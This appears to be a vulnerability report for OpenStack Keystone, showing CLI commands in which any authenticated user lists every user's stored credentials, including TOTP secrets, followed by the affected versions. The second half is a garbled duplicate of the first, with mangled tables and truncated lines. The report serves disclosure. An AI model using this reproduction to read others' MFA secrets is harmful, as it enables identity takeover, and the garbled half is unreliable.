# User creating a credential, i.e totp or similar
$ OS_CLOUD=1 openstack token issue
| project_id | c3caf1b55bb84b78a795fd81838e5160
| user_id | 9971b0f13d2d4a578212d028a53c3209
$ OS_CLOUD=1 openstack credential create --type test 9971b0f13d2d4a578212d028a53c3209 test-data
$ OS_CLOUD=1 openstack credential list
+----------------------------------+------+----------------------------------+-----------+------------+
| ID | Type | User ID | Data | Project ID |
+----------------------------------+------+----------------------------------+-----------+------------+
| 0a3a2d3b7dad4886b0bbf61b6cd7d2b0 | test | 9971b0f13d2d4a578212d028a53c3209 | test-data | None |
+----------------------------------+------+----------------------------------+-----------+------------+
# Different User but same Project
$ OS_CLOUD=2 openstack token issue
| project_id | c3caf1b55bb84b78a795fd81838e5160
| user_id | 6b28a0b073fc4ac7843f33190ebc5c3c
$ OS_CLOUD=2 openstack credential list
+----------------------------------+------+----------------------------------+-----------+------------+
| ID | Type | User ID | Data | Project ID |
+----------------------------------+------+----------------------------------+-----------+------------+
| 0a3a2d3b7dad4886b0bbf61b6cd7d2b0 | test | 9971b0f13d2d4a578212d028a53c3209 | test-data | None |
+----------------------------------+------+----------------------------------+-----------+------------+
# Different User and Different Project
$ OS_CLOUD=3 openstack token issue
| project_id | d43f20ae5a7e4f36b701710277384401
| user_id | 2e48f1a7d1474391a826a2b9700e5949
$ OS_CLOUD=3 openstack credential list
+----------------------------------+------+----------------------------------+-----------+------------+
| ID | Type | User ID | Data | Project ID |
+----------------------------------+------+----------------------------------+-----------+------------+
| 0a3a2d3b7dad4886b0bbf61b6cd7d2b0 | test | 9971b0f13d2d4a578212d028a53c3209 | test-data | None |
+----------------------------------+------+----------------------------------+-----------+------------+
As shown anyone who's authenticated can retrieve any credentials including their 'secret'.
This is a rather severe information disclosure vulnerability and completely defies the purpose of TOTP or MFA as these credentials are not kept secure or private whatsoever.
If Auth-rules are configured allow login with only 'topt' it would be extremely easy to assume a different user's identity.
A CVE should be issued for this. I can take care of that paperwork.
Versions affected and tested:
Train/ubuntu:
$ dpkg -l | grep keystone
ii keystone 2:16.0.0-0ubuntu1~cloud0 all OpenStack identity service - Daemons
ii keystone-common 2:16.0.0-0ubuntu1~cloud0 all OpenStack identity service - Common files
ii python-keystoneauth1 3.13.1-0ubuntu1~cloud0 all authentication library for OpenStack Identity - Python 2.7
ii python-keystoneclient 1:3.19.0-0ubuntu1~cloud0 all client library for the OpenStack Keystone API - Python 2.x
ii python-keystonemiddleware 6.0.0-0ubuntu1~cloud0 all Middleware for OpenStack Identity (Keystone) - Python 2.x
ii python3-keystone 2:16.0.0-0ubuntu1~cloud0 all OpenStack identity service - Python 3 library
ii python3-keystoneauth1 3.17.1-0ubuntu1~cloud0 all authentication library for OpenStack Identity - Python 3.x
ii python3-keystoneclient 1:3.21.0-0ubuntu1~cloud0 all client library for the OpenStack Keystone API - Python 3.x
ii python3-keystonemiddleware 7.0.1-0ubuntu1~cloud0 all Middleware for OpenStack Identity (Keystone) - Python 3.x
Tested against Stein and Train.
# User creating a credential, i.e totp or similar 8a795fd81838e51 60 78212d028a53c32 09 78212d028a53c32 09 test-data ------- ------- ------- ------- +------ +------ ------- ------- ------- ------- +------ -----+- ------- ----+ ------- ------- ------- ------- +------ +------ ------- ------- ------- ------- +------ -----+- ------- ----+ 6b0bbf61b6cd7d2 b0 | test | 9971b0f13d2d4a5 78212d028a53c32 09 | test-data | None | ------- ------- ------- ------- +------ +------ ------- ------- ------- ------- +------ -----+- ------- ----+
$ OS_CLOUD=1 openstack token issue
| project_id | c3caf1b55bb84b7
| user_id | 9971b0f13d2d4a5
$ OS_CLOUD=1 openstack credential create --type test 9971b0f13d2d4a5
$ OS_CLOUD=1 openstack credential list
+------
| ID | Type | User ID | Data | Project ID |
+------
| 0a3a2d3b7dad488
+------
# Different User but same Project 8a795fd81838e51 60 7843f33190ebc5c 3c ------- ------- ------- ------- +------ +------ ------- ------- ------- ------- +------ -----+- ------- ----+ ------- ------- ------- ------- +------ +------ ------- ------- ------- ------- +------ -----+- ------- ----+ 6b0bbf61b6cd7d2 b0 | test | 9971b0f13d2d4a5 78212d028a53c32 09 | test-data | None | ------- ------- ------- ------- +------ +------ ------- ------- ------- ------- +------ -----+- ------- ----+
$ OS_CLOUD=2 openstack token issue
| project_id | c3caf1b55bb84b7
| user_id | 6b28a0b073fc4ac
$ OS_CLOUD=2 openstack credential list
+------
| ID | Type | User ID | Data | Project ID |
+------
| 0a3a2d3b7dad488
+------
# Different User and Different Project 6b7017102773844 01 1a826a2b9700e59 49 ------- ------- ------- ------- +------ +------ ------- ------- ------- ------- +------ -----+- ------- ----+ ------- ------- ------- ------- +------ +------ ------- ------- ------- ------- +------ -----+- ------- ----+ 6b0bbf61b6cd7d2 b0 | test | 9971b0f13d2d4a5 78212d028a53c32 09 | test-data | None | ------- ------- ------- ------- +------ +------ ------- ------- ------- ------- +------ -----+- ------- ----+
$ OS_CLOUD=3 openstack token issue
| project_id | d43f20ae5a7e4f3
| user_id | 2e48f1a7d147439
$ OS_CLOUD=3 openstack credential list
+------
| ID | Type | User ID | Data | Project ID |
+------
| 0a3a2d3b7dad488
+------
As shown anyone who's authenticated can retrieve any credentials including their 'secret'.
This is a rather severe information disclosure vulnerability and completely defies the purpose of TOTP or MFA as these credentials are not kept secure or private whatsoever.
If Auth-rules are configured allow login with only 'topt' it would be extremely easy to assume a different user's identity.
A CVE should be issued for this. I can take care of that paperwork.
Versions affected and tested:
Train/ubuntu: 0-0ubuntu1~ cloud0 all OpenStack identity service - Daemons 0-0ubuntu1~ cloud0 all OpenStack identity service - Common files keystoneauth1 3.13.1- 0ubuntu1~ cloud0 all authentication library for OpenStack Identity - Python 2.7 keystoneclient 1:3.19. 0-0ubuntu1~ cloud0 all client library for the OpenStack Keystone API - Python 2.x keystonemiddlew are 6.0.0-0ubuntu1~ cloud0 all Middleware for OpenStack Identity (Keystone) - Python 2.x 0-0ubuntu1~ cloud0 all OpenStack identity service - Python 3 library keystoneauth1 3.17.1- 0ubuntu1~ cloud0 all authentication library for OpenStack Identity - Python 3.x keystoneclient 1:3.21. 0-0ubuntu1~ cloud0 all client library for the OpenStack Keystone API - Python 3.x keystonemiddlew are 7.0.1-0ubuntu1~ cloud0 all Middleware for OpenStack Identity (Keystone) - Python 3.x
$ dpkg -l | grep keystone
ii keystone 2:16.0.
ii keystone-common 2:16.0.
ii python-
ii python-
ii python-
ii python3-keystone 2:16.0.
ii python3-
ii python3-
ii python3-
Stein/RHEL: keystoneclient- 3.19.0- 0.2019031207033 0.6c4bb8b. el8ost. noarch keystone- 15.0.1- 0.2019072006041 2.5f27c4b. el8ost. noarch keystoneauth1- 3.13.1- 0.2019031105241 4.bde07bc. el8ost. noarch keystonemiddlew are-6.0. 0-0.20190312071 144.fca37ea. el8ost. noarch keystone- 15.0.1- 0.2019072006041 2.5f27c4b. el8ost. noarch
$ rpm -qa | grep keystone
python3-
openstack-
python3-
python3-
python3-